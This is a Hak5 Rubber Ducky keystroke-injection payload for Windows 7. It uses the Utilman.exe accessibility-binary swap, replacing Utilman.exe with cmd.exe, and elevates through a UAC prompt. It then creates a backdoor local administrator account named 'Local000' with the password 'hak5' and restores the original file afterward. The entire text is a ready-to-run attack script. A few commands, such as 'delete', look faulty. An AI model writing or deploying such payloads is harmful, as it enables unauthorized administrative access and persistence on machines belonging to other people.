Author: Xcellerator (props to Jay Kruer’s Fork Bomb script for the UAC bypass technique!) Duckencoder: 1.0 Target: Windows 7 Description: Uses the Utilman.exe Exploit to create a new local administrator account “Local000” with the password “hak5”.
REM Author: Xcellerator REM Description: Utilman Exploiter to create a new Admin Account REM The new account will be called "Local000". GUI DELAY 50 STRING cmd MENU STRING a ENTER LEFT ENTER DELAY 200 STRING takeown /f "%systemroot%\System32\Utilman.exe" ENTER DELAY 50 STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T ENTER DELAY 50 STRING cd %systemroot%\System32 ENTER DELAY 50 STRING mkdir util ENTER STRING xcopy cmd.exe util\ ENTER DELAY 50 STRING ren Utilman.exe Utilman.exe.bak ENTER STRING cd util ENTER DELAY 50 STRING ren cmd.exe Utilman.exe ENTER DELAY 50 STRING cd .. ENTER DELAY 50 STRING xcopy util/Utilman.exe \ ENTER DELAY 50 STRING rmdir /s /q util ENTER DELAY 50 STRING exit ENTER DELAY 50 GUI u STRING net user Local000 /add ENTER DELAY 50 STRING net localgroup administrators Local000 /add ENTER DELAY 50 STRING exit ENTER DELAY 50 GUI r STRING cmd ENTER DELAY 50 STRING cd "%systemroot%\System32" ENTER DELAY 50 STRING delete Utilman.exe ENTER DELAY 50 STRING y ENTER DELAY 50 STRING ren Utilman.exe.bak Utilman.exe ENTER DELAY 50 STRING exit ENTER GUI STRING cmd MENU STRING a ENTER DELAY 50 LEFT ENTER DELAY 200 STRING net user Local000 * ENTER STRING hak5 ENTER STRING hak5 ENTER STRING exit ENTER